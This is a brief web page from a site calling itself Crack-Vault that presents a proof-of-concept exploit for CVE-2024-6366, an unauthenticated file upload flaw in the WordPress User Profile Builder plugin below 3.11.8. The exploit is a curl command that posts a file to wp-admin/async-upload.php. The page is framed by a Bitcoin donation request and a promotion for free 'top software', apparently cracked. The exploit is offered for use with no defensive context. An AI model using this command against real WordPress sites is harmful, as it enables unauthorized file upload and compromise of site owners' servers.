Support Crack-Vault and help us keep providing free tools. Every donation counts! (BTC) Address: bc1qhhva8uplmkaa3kkwxnux9t3y6l6kmhnwqzktzn

EXPLOIT CVE 2024-6366 RCE POC

CVE ID : CVE-2024-6366
System : wordpress
Type : file upload

Exploit :

Nuclei temp (https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-6366.yaml)
User Profile Builder plugin < 3.11.8
curl -vvvv -X POST -F 'wppb_upload=true' \
-F 'meta_name=test.jpg' \
-F '_wpnonce=e8' \
-F 'action=upload-attachment' \
-F 'async-upload=@test.jpg' \
https://example.com/wp-admin/async-upload.php

📱

Download Now—Top Software, No Cost!